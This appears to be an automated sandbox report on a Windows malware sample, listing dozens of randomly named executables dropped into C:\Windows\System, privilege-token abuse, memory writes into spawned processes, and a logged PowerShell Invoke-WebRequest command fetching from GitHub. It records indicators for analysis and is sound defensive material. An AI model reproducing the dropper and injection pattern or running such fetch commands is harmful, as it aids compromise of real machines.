File created C:\Windows\System\dbyTBoE.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KLoncVM.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vtnGKOV.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xNlsDNu.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\wHJEpvU.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EHoXqdq.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LXpJSuP.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UyVWbKZ.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GBFOtcB.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jwJkRUS.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\YBQHRXT.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zjubvXs.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mBnDath.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\uBxZKzP.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MLyklzz.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\rSyXhBl.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TbYhMbC.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bWWvGkE.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\cGRFoHq.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ibvLYLW.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aOlMxVp.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ejEkfVB.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\upvMKVV.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SkOoBQm.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vCxNVfM.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\qIbLhMr.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ulqKLWe.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QkCbvwt.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IYPeRRN.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\MBdtcMs.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\imNkznx.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
File created C:\Windows\System\btlJRgJ.exe C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1048 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1048 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\boMoguf.exe
PID 1048 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\boMoguf.exe
PID 1048 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\iQoVlVu.exe
PID 1048 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\iQoVlVu.exe
PID 1048 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XmUppaC.exe
PID 1048 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XmUppaC.exe
PID 1048 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\xvHeImQ.exe
PID 1048 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\xvHeImQ.exe
PID 1048 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XWhXKiz.exe
PID 1048 wrote to memory of 4524 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\XWhXKiz.exe
PID 1048 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\liMpmKv.exe
PID 1048 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\liMpmKv.exe
PID 1048 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\plupKYM.exe
PID 1048 wrote to memory of 2844 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\plupKYM.exe
PID 1048 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\FdiSYks.exe
PID 1048 wrote to memory of 116 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\FdiSYks.exe
PID 1048 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ADELqbG.exe
PID 1048 wrote to memory of 1868 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ADELqbG.exe
PID 1048 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\RMWtnjz.exe
PID 1048 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\RMWtnjz.exe
PID 1048 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EjtWVbQ.exe
PID 1048 wrote to memory of 2948 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EjtWVbQ.exe
PID 1048 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\uLLcFTT.exe
PID 1048 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\uLLcFTT.exe
PID 1048 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\cdaHRpZ.exe
PID 1048 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\cdaHRpZ.exe
PID 1048 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qlRKsKJ.exe
PID 1048 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qlRKsKJ.exe
PID 1048 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\MNTgqrx.exe
PID 1048 wrote to memory of 1320 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\MNTgqrx.exe
PID 1048 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qcypcLz.exe
PID 1048 wrote to memory of 656 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\qcypcLz.exe
PID 1048 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ebLBrBw.exe
PID 1048 wrote to memory of 2004 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\ebLBrBw.exe
PID 1048 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\vmvEDaL.exe
PID 1048 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\vmvEDaL.exe
PID 1048 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\JGtYHFa.exe
PID 1048 wrote to memory of 2344 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\JGtYHFa.exe
PID 1048 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\PhEMEYy.exe
PID 1048 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\PhEMEYy.exe
PID 1048 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EvkUEIs.exe
PID 1048 wrote to memory of 2732 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\EvkUEIs.exe
PID 1048 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\wyKiHFz.exe
PID 1048 wrote to memory of 5000 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\wyKiHFz.exe
PID 1048 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\DdXURTq.exe
PID 1048 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\DdXURTq.exe
PID 1048 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\GEuQvGW.exe
PID 1048 wrote to memory of 3080 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\GEuQvGW.exe
PID 1048 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\dSNZCQF.exe
PID 1048 wrote to memory of 5064 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\dSNZCQF.exe
PID 1048 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\nDPBRxQ.exe
PID 1048 wrote to memory of 824 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\nDPBRxQ.exe
PID 1048 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\lkeyDyB.exe
PID 1048 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\lkeyDyB.exe
PID 1048 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\OfpgkLf.exe
PID 1048 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\OfpgkLf.exe
PID 1048 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\oamUrnf.exe
PID 1048 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\oamUrnf.exe
PID 1048 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\bslXWOc.exe
PID 1048 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\bslXWOc.exe
PID 1048 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\AFSEpfB.exe
PID 1048 wrote to memory of 764 N/A C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe C:\Windows\System\AFSEpfB.exe

Processes

C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\8a3ee27c404c28188723767f65cad6c0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\boMoguf.exe

C:\Windows\System\boMoguf.exe

C:\Windows\System\iQoVlVu.exe

C:\Windows\System\iQoVlVu.exe

C:\Windows\System\XmUppaC.exe

C:\Windows\System\XmUppaC.exe

C:\Windows\System\xvHeImQ.exe

C:\Windows\System\xvHeImQ.exe

C:\Windows\System\XWhXKiz.exe

C:\Windows\System\XWhXKiz.exe

C:\Windows\System\liMpmKv.exe

C:\Windows\System\liMpmKv.exe

C:\Windows\System\plupKYM.exe

C:\Windows\System\plupKYM.exe

C:\Windows\System\FdiSYks.exe

C:\Windows\System\FdiSYks.exe

C:\Windows\System\ADELqbG.exe

C:\Windows\System\ADELqbG.exe

C:\Windows\System\RMWtnjz.exe

C:\Windows\System\RMWtnjz.exe

C:\Windows\System\EjtWVbQ.exe

C:\Windows\System\EjtWVbQ.exe

C:\Windows\System\uLLcFTT.exe

C:\Windows\System\uLLcFTT.exe

C:\Windows\System\cdaHRpZ.exe

C:\Windows\System\cdaHRpZ.exe

C:\Windows\System\qlRKsKJ.exe

C:\Windows\System\qlRKsKJ.exe

C:\Windows\System\MNTgqrx.exe

C:\Windows\System\MNTgqrx.exe

C:\Windows\System\qcypcLz.exe

C:\Windows\System\qcypcLz.exe

C:\Windows\System\ebLBrBw.exe

C:\Windows\System\ebLBrBw.exe

C:\Windows\System\vmvEDaL.exe

C:\Windows\System\vmvEDaL.exe

C:\Windows\System\JGtYHFa.exe

C:\Windows\System\JGtYHFa.exe

C:\Windows\System\PhEMEYy.exe

C:\Windows\System\PhEMEYy.exe

C:\Windows\System\EvkUEIs.exe

C:\Windows\System\EvkUEIs.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4040,i,7977653611488681184,6839495125838449898,262144 --variations-seed-version --mojo-platform-channel-handle=4340 /prefetch:8

C:\Windows\System\wyKiHFz.exe

C:\Windows\System\wyKiHFz.exe

C:\Windows\System\DdXURTq.exe

C:\Windows\System\DdXURTq.exe

C:\Windows\System\GEuQvGW.exe

C:\Windows\System\GEuQvGW.exe

C:\Windows\System\dSNZCQF.exe

C:\Windows\System\dSNZCQF.exe

C:\Windows\System\nDPBRxQ.exe

C:\Windows\System\nDPBRxQ.exe

C:\Windows\System\lkeyDyB.exe

C:\Windows\System\lkeyDyB.exe

C:\Windows\System\OfpgkLf.exe

C:\Windows\System\OfpgkLf.exe

C:\Windows\System\oamUrnf.exe

C:\Windows\System\oamUrnf.exe

C:\Windows\System\bslXWOc.exe

C:\Windows\System\bslXWOc.exe

C:\Windows\System\AFSEpfB.exe

C:\Windows\System\AFSEpfB.exe

C:\Windows\System\sMjQmSh.exe

C:\Windows\System\sMjQmSh.exe

C:\Windows\System\LNcqjwO.exe

C:\Windows\System\LNcqjwO.exe

C:\Windows\System\JqXWfGK.exe

C:\Windows\System\JqXWfGK.exe

C:\Windows\System\QUuRjPJ.exe

C:\Windows\System\QUuRjPJ.exe

C:\Windows\System\YSVUtZS.exe

C:\Windows\System\YSVUtZS.exe

C:\Windows\System\hMZHoYw.exe

C:\Windows\System\hMZHoYw.exe

C:\Windows\System\qUQgRPL.exe

C:\Windows\System\qUQgRPL.exe

C:\Windows\System\KSiCwAU.exe

C:\Windows\System\KSiCwAU.exe

C:\Windows\System\VmhBdBB.exe

C:\Windows\System\VmhBdBB.exe

C:\Windows\System\mSTTUhV.exe

C:\Windows\System\mSTTUhV.exe

C:\Windows\System\DStCmgL.exe

C:\Windows\System\DStCmgL.exe

C:\Windows\System\jyLsbwn.exe

C:\Windows\System\jyLsbwn.exe

C:\Windows\System\ZoEZcyu.exe

C:\Windows\System\ZoEZcyu.exe

C:\Windows\System\jLlKNww.exe

C:\Windows\System\jLlKNww.exe

C:\Windows\System\gKTEGyA.exe

C:\Windows\System\gKTEGyA.exe

C:\Windows\System\lVDJAca.exe

C:\Windows\System\lVDJAca.exe

C:\Windows\System\TGOMiZg.exe

C:\Windows\System\TGOMiZg.exe

C:\Windows\System\gdIGmEO.exe

C:\Windows\System\gdIGmEO.exe

C:\Windows\System\WRuqRhu.exe

C:\Windows\System\WRuqRhu.exe

C:\Windows\System\zzPVvQy.exe

C:\Windows\System\zzPVvQy.exe

C:\Windows\System\RyPiaWN.exe

C:\Windows\System\RyPiaWN.exe

C:\Windows\System\uUvbHaL.exe

C:\Windows\System\uUvbHaL.exe

C:\Windows\System\ExGEuVW.exe

C:\Windows\System\ExGEuVW.exe

C:\Windows\System\jlIDvOK.exe

C:\Windows\System\jlIDvOK.exe

C:\Windows\System\EvhosdO.exe

C:\Windows\System\EvhosdO.exe

C:\Windows\System\kPGQmsO.exe

C:\Windows\System\kPGQmsO.exe

C:\Windows\System\zTxUbIJ.exe

C:\Windows\System\zTxUbIJ.exe

C:\Windows\System\aRrORpy.exe

C:\Windows\System\aRrORpy.exe

C:\Windows\System\uCmFlfk.exe

C:\Windows\System\uCmFlfk.exe

C:\Windows\System\qZVsdEd.exe

C:\Windows\System\qZVsdEd.exe

C:\Windows\System\ABsWUOs.exe

C:\Windows\System\ABsWUOs.exe

C:\Windows\System\fWHsKGW.exe

C:\Windows\System\fWHsKGW.exe

C:\Windows\System\RCqywIx.exe

C:\Windows\System\RCqywIx.exe

C:\Windows\System\lueiLJN.exe

C:\Windows\System\lueiLJN.exe

C:\Windows\System\FdzajaR.exe

C:\Windows\System\FdzajaR.exe

C:\Windows\System\KLoncVM.exe

C:\Windows\System\KLoncVM.exe

C:\Windows\System\QEmsmkE.exe

C:\Windows\System\QEmsmkE.exe

C:\Windows\System\ToElgib.exe

C:\Windows\System\ToElgib.exe

C:\Windows\System\MNaBpNr.exe

C:\Windows\System\MNaBpNr.exe

C:\Windows\System\XVXxsSQ.exe

C:\Windows\System\XVXxsSQ.exe

C:\Windows\System\OCzJOEC.exe

C:\Windows\System\OCzJOEC.exe

C:\Windows\System\fFczAbp.exe

C:\Windows\System\fFczAbp.exe

C:\Windows\System\DtGIwKq.exe

C:\Windows\System\DtGIwKq.exe

C:\Windows\System\hLNcngN.exe

C:\Windows\System\hLNcngN.exe

C:\Windows\System\lLiweAI.exe

C:\Windows\System\lLiweAI.exe

C:\Windows\System\BRIAtrj.exe

C:\Windows\System\BRIAtrj.exe

C:\Windows\System\FkfOhmV.exe

C:\Windows\System\FkfOhmV.exe

C:\Windows\System\ynDWUky.exe

C:\Windows\System\ynDWUky.exe

C:\Windows\System\ueQCHFK.exe

C:\Windows\System\ueQCHFK.exe

C:\Windows\System\WtosUlb.exe

C:\Windows\System\WtosUlb.exe

C:\Windows\System\TvrxoJW.exe

C:\Windows\System\TvrxoJW.exe

C:\Windows\System\PKYMEqq.exe

C:\Windows\System\PKYMEqq.exe

C:\Windows\System\KpXkKRz.exe

C:\Windows\System\KpXkKRz.exe

C:\Windows\System\wVPeFFK.exe

C:\Windows\System\wVPeFFK.exe

C:\Windows\System\qNaqkiI.exe

C:\Windows\System\qNaqkiI.exe

C:\Windows\System\ZSENtTf.exe

C:\Windows\System\ZSENtTf.exe

C:\Windows\System\rucfsEs.exe

C:\Windows\System\rucfsEs.exe

C:\Windows\System\HTopyum.exe

C:\Windows\System\HTopyum.exe

C:\Windows\System\OmddmKr.exe

C:\Windows\System\OmddmKr.exe

C:\Windows\System\gaZhaVn.exe

C:\Windows\System\gaZhaVn.exe

C:\Windows\System\tpMZWlW.exe

C:\Windows\System\tpMZWlW.exe

C:\Windows\System\ebxWDHI.exe

C:\Windows\System\ebxWDHI.exe

C:\Windows\System\qIbLhMr.exe

C:\Windows\System\qIbLhMr.exe

C:\Windows\System\TQNyYVw.exe

C:\Windows\System\TQNyYVw.exe

C:\Windows\System\kahtnMP.exe

C:\Windows\System\kahtnMP.exe

C:\Windows\System\gGKKHrV.exe

C:\Windows\System\gGKKHrV.exe

C:\Windows\System\VGTFVkL.exe

C:\Windows\System\VGTFVkL.exe

C:\Windows\System\vuHRHyl.exe

C:\Windows\System\vuHRHyl.exe

C:\Windows\System\lCsvLjH.exe

C:\Windows\System\lCsvLjH.exe

C:\Windows\System\IDDNZDP.exe

C:\Windows\System\IDDNZDP.exe

C:\Windows\System\kCeVlPk.exe

C:\Windows\System\kCeVlPk.exe

C:\Windows\System\BrlhvvS.exe

C:\Windows\System\BrlhvvS.exe

C:\Windows\System\lrWKvag.exe

C:\Windows\System\lrWKvag.exe

C:\Windows\System\WOYOYvG.exe

C:\Windows\System\WOYOYvG.exe

C:\Windows\System\vtnGKOV.exe

C:\Windows\System\vtnGKOV.exe

C:\Windows\System\CgOqAUc.exe

C:\Windows\System\CgOqAUc.exe

C:\Windows\System\uBVVGhF.exe

C:\Windows\System\uBVVGhF.exe

C:\Windows\System\gHnqmDT.exe

C:\Windows\System\gHnqmDT.exe

C:\Windows\System\NiWHdXj.exe

C:\Windows\System\NiWHdXj.exe

C:\Windows\System\CzbwqJF.exe

C:\Windows\System\CzbwqJF.exe

C:\Windows\System\RGXhvSH.exe

C:\Windows\System\RGXhvSH.exe

C:\Windows\System\nKxOzgb.exe

C:\Windows\System\nKxOzgb.exe

C:\Windows\System\aGyJTwe.exe

C:\Windows\System\aGyJTwe.exe

C:\Windows\System\tTHgdnr.exe

C:\Windows\System\tTHgdnr.exe

C:\Windows\System\PFqiDjG.exe

C:\Windows\System\PFqiDjG.exe

C:\Windows\System\ITVMGiY.exe

C:\Windows\System\ITVMGiY.exe

C:\Windows\System\tLmJjxB.exe

C:\Windows\System\tLmJjxB.exe

C:\Windows\System\qrPiQUC.exe

C:\Windows\System\qrPiQUC.exe

C:\Windows\System\BVvOSXN.exe

C:\Windows\System\BVvOSXN.exe

C:\Windows\System\fFvkIkS.exe

C:\Windows\System\fFvkIkS.exe

C:\Windows\System\dYZNfgI.exe

C:\Windows\System\dYZNfgI.exe

C:\Windows\System\TVgFWLH.exe

C:\Windows\System\TVgFWLH.exe

C:\Windows\System\OIeFhIO.exe

C:\Windows\System\OIeFhIO.exe

C:\Windows\System\UCoAKkk.exe

C:\Windows\System\UCoAKkk.exe

C:\Windows\System\kOrechJ.exe

C:\Windows\System\kOrechJ.exe

C:\Windows\System\CZVztsS.exe

C:\Windows\System\CZVztsS.exe

C:\Windows\System\vBcjQsC.exe

C:\Windows\System\vBcjQsC.exe

C:\Windows\System\MdAIDYV.exe

C:\Windows\System\MdAIDYV.exe

C:\Windows\System\sgPfuiE.exe

C:\Windows\System\sgPfuiE.exe

C:\Windows\System\psJKAUZ.exe

C:\Windows\System\psJKAUZ.exe

C:\Windows\System\gPHgJim.exe

C:\Windows\System\gPHgJim.exe

C:\Windows\System\bOAkAEV.exe

C:\Windows\System\bOAkAEV.exe

C:\Windows\System\eGrAoUR.exe

C:\Windows\System\eGrAoUR.exe

C:\Windows\System\cDHjyzk.exe

C:\Windows\System\cDHjyzk.exe

C:\Windows\System\OyANdLT.exe

C:\Windows\System\OyANdLT.exe

C:\Windows\System\YiLxOUl.exe

C:\Windows\System\YiLxOUl.exe

C:\Windows\System\EOWcHzM.exe

C:\Windows\System\EOWcHzM.exe

C:\Windows\System\mTSbrjF.exe

C:\Windows\System\mTSbrjF.exe

C:\Windows\System\OpMbepO.exe

C:\Windows\System\OpMbepO.exe

C:\Windows\System\esHyvPv.exe

C:\Windows\System\esHyvPv.exe

